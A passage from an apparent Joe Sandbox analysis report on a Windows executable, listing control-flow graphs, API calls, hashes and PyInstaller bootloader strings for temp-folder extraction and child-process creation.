                                                                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                                          • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                                          • Opcode ID: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
                                                                                                                                                                                                                                                                          • Instruction ID: 4f122e32366fb8e1d08d99a2b96be18d9d109e7f0357e82f7b6e2e033ccfda18
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4D1BE26B0824386E72CBF6998501B9A761EF447C4FC08135EA6D47AE5DF3CE441C7E2

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 318 7ff7fbde72bc-7ff7fbde732f call 7ff7fbde6ff0 321 7ff7fbde7331-7ff7fbde733a call 7ff7fbdd54a4 318->321 322 7ff7fbde7349-7ff7fbde7353 call 7ff7fbdd8434 318->322 329 7ff7fbde733d-7ff7fbde7344 call 7ff7fbdd54c4 321->329 327 7ff7fbde7355-7ff7fbde736c call 7ff7fbdd54a4 call 7ff7fbdd54c4 322->327 328 7ff7fbde736e-7ff7fbde73d7 CreateFileW 322->328 327->329 331 7ff7fbde7454-7ff7fbde745f GetFileType 328->331 332 7ff7fbde73d9-7ff7fbde73df 328->332 340 7ff7fbde768a-7ff7fbde76aa 329->340 335 7ff7fbde74b2-7ff7fbde74b9 331->335 336 7ff7fbde7461-7ff7fbde749c GetLastError call 7ff7fbdd5438 CloseHandle 331->336 338 7ff7fbde7421-7ff7fbde744f GetLastError call 7ff7fbdd5438 332->338 339 7ff7fbde73e1-7ff7fbde73e5 332->339 343 7ff7fbde74c1-7ff7fbde74c4 335->343 344 7ff7fbde74bb-7ff7fbde74bf 335->344 336->329 352 7ff7fbde74a2-7ff7fbde74ad call 7ff7fbdd54c4 336->352 338->329 339->338 345 7ff7fbde73e7-7ff7fbde741f CreateFileW 339->345 349 7ff7fbde74ca-7ff7fbde751f call 7ff7fbdd834c 343->349 350 7ff7fbde74c6 343->350 344->349 345->331 345->338 357 7ff7fbde7521-7ff7fbde752d call 7ff7fbde71f8 349->357 358 7ff7fbde753e-7ff7fbde756f call 7ff7fbde6d70 349->358 350->349 352->329 357->358 363 7ff7fbde752f 357->363 364 7ff7fbde7575-7ff7fbde75b7 358->364 365 7ff7fbde7571-7ff7fbde7573 358->365 366 7ff7fbde7531-7ff7fbde7539 call 7ff7fbddb084 363->366 367 7ff7fbde75d9-7ff7fbde75e4 364->367 368 7ff7fbde75b9-7ff7fbde75bd 364->368 365->366 366->340 371 7ff7fbde7688 367->371 372 7ff7fbde75ea-7ff7fbde75ee 367->372 368->367 370 7ff7fbde75bf-7ff7fbde75d4 368->370 370->367 371->340 372->371 374 7ff7fbde75f4-7ff7fbde7639 CloseHandle CreateFileW 372->374 375 7ff7fbde763b-7ff7fbde7669 GetLastError call 7ff7fbdd5438 call 7ff7fbdd8574 374->375 376 7ff7fbde766e-7ff7fbde7683 374->376 375->376 376->371
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                          • Opcode ID: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
                                                                                                                                                                                                                                                                          • Instruction ID: 7665887a2be1b20f3eb0f9e0bcf71273cfe9157932c19d67e2d7f75197719d6f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAC1C336B24A4785EB58DFA8C4801AC7761FB49B98B810235DE3E573E5CF38E052C392

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF7FBDC154F), ref: 00007FF7FBDC79E7
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC7B60: GetEnvironmentVariableW.KERNEL32(00007FF7FBDC3A1F), ref: 00007FF7FBDC7B9A
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC7B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7FBDC7BB7
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDD7DEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FBDD7E05
                                                                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32 ref: 00007FF7FBDC7AA1
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC2B30: MessageBoxW.USER32 ref: 00007FF7FBDC2C05
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                                          • API String ID: 3752271684-1116378104
                                                                                                                                                                                                                                                                          • Opcode ID: d0ee005bfdeb011a84540aff6346199bb1fc02b76f4ac94b865217064e0c6b04
                                                                                                                                                                                                                                                                          • Instruction ID: 1eec0a5d33c4e38320ed0cdff2fcd4c3d29aefe49cf00488005d46d4ab84e664
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0ee005bfdeb011a84540aff6346199bb1fc02b76f4ac94b865217064e0c6b04
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33519291B0A24351FB1DB77E98112BAD2525F88BC0FC44031ED6E4B7F6EE2CE40186E2

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 766 7ff7fbde65ec-7ff7fbde6621 call 7ff7fbde5cf8 call 7ff7fbde5d00 call 7ff7fbde5d68 773 7ff7fbde675f-7ff7fbde67cd call 7ff7fbddaec4 call 7ff7fbde1be8 766->773 774 7ff7fbde6627-7ff7fbde6632 call 7ff7fbde5d08 766->774 786 7ff7fbde67cf-7ff7fbde67d6 773->786 787 7ff7fbde67db-7ff7fbde67de 773->787 774->773 779 7ff7fbde6638-7ff7fbde6643 call 7ff7fbde5d38 774->779 779->773 785 7ff7fbde6649-7ff7fbde666c call 7ff7fbddaf0c GetTimeZoneInformation 779->785 799 7ff7fbde6734-7ff7fbde675e call 7ff7fbde5cf0 call 7ff7fbde5ce0 call 7ff7fbde5ce8 785->799 800 7ff7fbde6672-7ff7fbde6693 785->800 791 7ff7fbde686b-7ff7fbde686e 786->791 788 7ff7fbde6815-7ff7fbde6828 call 7ff7fbdddbbc 787->788 789 7ff7fbde67e0 787->789 807 7ff7fbde6833-7ff7fbde684e call 7ff7fbde1be8 788->807 808 7ff7fbde682a 788->808 792 7ff7fbde67e3 789->792 791->792 795 7ff7fbde6874-7ff7fbde687c call 7ff7fbde6370 791->795 797 7ff7fbde67e8-7ff7fbde6814 call 7ff7fbddaf0c call 7ff7fbdcbcc0 792->797 798 7ff7fbde67e3 call 7ff7fbde65ec 792->798 795->797 798->797 803 7ff7fbde6695-7ff7fbde669b 800->803 804 7ff7fbde669e-7ff7fbde66a5 800->804 803->804 810 7ff7fbde66a7-7ff7fbde66af 804->810 811 7ff7fbde66b9 804->811 821 7ff7fbde6855-7ff7fbde6867 call 7ff7fbddaf0c 807->821 822 7ff7fbde6850-7ff7fbde6853 807->822 814 7ff7fbde682c-7ff7fbde6831 call 7ff7fbddaf0c 808->814 810->811 816 7ff7fbde66b1-7ff7fbde66b7 810->816 818 7ff7fbde66bb-7ff7fbde672f call 7ff7fbdcd0e0 * 4 call 7ff7fbde31cc call 7ff7fbde6884 * 2 811->818 814->789 816->818 818->799 821->791 822->814
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7FBDE661A
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDE5D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FBDE5D7C
                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7FBDE662B
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDE5D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FBDE5D1C
                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7FBDE663C
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDE5D38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FBDE5D4C
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDDAF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF7FBDE3392,?,?,?,00007FF7FBDE33CF,?,?,00000000,00007FF7FBDE3895,?,?,00000000,00007FF7FBDE37C7), ref: 00007FF7FBDDAF22
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDDAF0C: GetLastError.KERNEL32(?,?,?,00007FF7FBDE3392,?,?,?,00007FF7FBDE33CF,?,?,00000000,00007FF7FBDE3895,?,?,00000000,00007FF7FBDE37C7), ref: 00007FF7FBDDAF2C
                                                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7FBDE687C), ref: 00007FF7FBDE6663
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                                          • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                                          • Opcode ID: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
                                                                                                                                                                                                                                                                          • Instruction ID: 5f9ba8476a7ea3360e2bb192388cec93df6c8d7c10696c3b8f7704883eb0d6a0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1519332A0864386E718FF69D8905A9A360BB487C4FC04135EA6D87AF5DF3CE441C7E2

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 0 7ff7fbdc1710-7ff7fbdc1724 1 7ff7fbdc1726-7ff7fbdc173d call 7ff7fbdc2b30 0->1 2 7ff7fbdc173e-7ff7fbdc1742 0->2 4 7ff7fbdc1744-7ff7fbdc174d call 7ff7fbdc12b0 2->4 5 7ff7fbdc1768-7ff7fbdc178b call 7ff7fbdc7c10 2->5 11 7ff7fbdc175f-7ff7fbdc1767 4->11 12 7ff7fbdc174f-7ff7fbdc175a call 7ff7fbdc2b30 4->12 13 7ff7fbdc17b9-7ff7fbdc17d4 call 7ff7fbdc3fd0 5->13 14 7ff7fbdc178d-7ff7fbdc17b8 call 7ff7fbdc2890 5->14 12->11 20 7ff7fbdc17d6-7ff7fbdc17e9 call 7ff7fbdc2b30 13->20 21 7ff7fbdc17ee-7ff7fbdc1801 call 7ff7fbdd0814 13->21 26 7ff7fbdc192f-7ff7fbdc1932 call 7ff7fbdd018c 20->26 27 7ff7fbdc1823-7ff7fbdc1827 21->27 28 7ff7fbdc1803-7ff7fbdc181e call 7ff7fbdc2890 21->28 34 7ff7fbdc1937-7ff7fbdc194e 26->34 31 7ff7fbdc1841-7ff7fbdc1861 call 7ff7fbdd4f90 27->31 32 7ff7fbdc1829-7ff7fbdc1835 call 7ff7fbdc1050 27->32 37 7ff7fbdc1927-7ff7fbdc192a call 7ff7fbdd018c 28->37 41 7ff7fbdc1882-7ff7fbdc1888 31->41 42 7ff7fbdc1863-7ff7fbdc187d call 7ff7fbdc2890 31->42 38 7ff7fbdc183a-7ff7fbdc183c 32->38 37->26 38->37 43 7ff7fbdc1915-7ff7fbdc1918 call 7ff7fbdd4f7c 41->43 44 7ff7fbdc188e-7ff7fbdc1897 41->44 49 7ff7fbdc191d-7ff7fbdc1922 42->49 43->49 48 7ff7fbdc18a0-7ff7fbdc18c2 call 7ff7fbdd04dc 44->48 52 7ff7fbdc18f5-7ff7fbdc18fc 48->52 53 7ff7fbdc18c4-7ff7fbdc18dc call 7ff7fbdd0c1c 48->53 49->37 55 7ff7fbdc1903-7ff7fbdc190b call 7ff7fbdc2890 52->55 58 7ff7fbdc18e5-7ff7fbdc18f3 53->58 59 7ff7fbdc18de-7ff7fbdc18e1 53->59 61 7ff7fbdc1910 55->61 58->55 59->48 62 7ff7fbdc18e3 59->62 61->43 62->61
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                                                          • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                                                                                                                                                                                                                          • API String ID: 2030045667-3833288071
                                                                                                                                                                                                                                                                          • Opcode ID: f04140c9c59cf387eb7b02bda7978316030acfa12df2fb7f8ac4a2156345baff
                                                                                                                                                                                                                                                                          • Instruction ID: 6357a5efd5993124d4a83b6f187206ef8158208c90a0d29f8755002f72706978
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f04140c9c59cf387eb7b02bda7978316030acfa12df2fb7f8ac4a2156345baff
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5951BEA5B0964382EB1DBB59E8902A9A394BF48794FC04031DE6C077F5DE3CF24487E2

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(0000000100000001,00007FF7FBDC414C,00007FF7FBDC7911,?,00007FF7FBDC7D26,?,00007FF7FBDC1785), ref: 00007FF7FBDC8990
                                                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(?,00007FF7FBDC7D26,?,00007FF7FBDC1785), ref: 00007FF7FBDC89A1
                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00007FF7FBDC7D26,?,00007FF7FBDC1785), ref: 00007FF7FBDC89C3
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF7FBDC7D26,?,00007FF7FBDC1785), ref: 00007FF7FBDC89CD
                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00007FF7FBDC7D26,?,00007FF7FBDC1785), ref: 00007FF7FBDC8A0A
                                                                                                                                                                                                                                                                          • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7FBDC8A1C
                                                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,00007FF7FBDC7D26,?,00007FF7FBDC1785), ref: 00007FF7FBDC8A34
                                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF7FBDC7D26,?,00007FF7FBDC1785), ref: 00007FF7FBDC8A66
                                                                                                                                                                                                                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF7FBDC8A8D
                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00007FF7FBDC7D26,?,00007FF7FBDC1785), ref: 00007FF7FBDC8A9E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                                                                                                                          • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                                                                                                                          • API String ID: 4998090-2855260032
                                                                                                                                                                                                                                                                          • Opcode ID: 9d301874694f13eee612efc427f36135b77fc192910b60788b949b6aa4b4f411
                                                                                                                                                                                                                                                                          • Instruction ID: 4cc0e909f049fab5c43444ebc6a1981d9541f62f39bf5f0eeba3c4de41331b92
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d301874694f13eee612efc427f36135b77fc192910b60788b949b6aa4b4f411
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3841953161964782EB18AF58E4846BAB361FB84750F840231EAAE476F5DF3CF404C7D2

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _fread_nolock$Message
                                                                                                                                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                                                                                                                          • API String ID: 677216364-1384898525
                                                                                                                                                                                                                                                                          • Opcode ID: a89c5085c4da9417b26c18743fa88cc49dedc0d50437dac9bee42ac441f1655d
                                                                                                                                                                                                                                                                          • Instruction ID: b57df5e9d2df103a9bb8f88c47b68569cb6f476e2be98db26cefb5c11cccb9f7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a89c5085c4da9417b26c18743fa88cc49dedc0d50437dac9bee42ac441f1655d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC517BB5A0960386EB1CEF2DD590178B7A0EF48B84B914135E92C477F9DE7CE4008BE6

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                                                                          • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                                                                                                          • API String ID: 2895956056-3524285272
                                                                                                                                                                                                                                                                          • Opcode ID: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
                                                                                                                                                                                                                                                                          • Instruction ID: bf64f069b9c3a133fef0b9bf96bf2880a721c2c657f23c8dd881c1c81b5fc45d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F415475A0878782DB28AB68E4952AAF360FF94360F900335E6BD437E5DF7CD0448B91

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
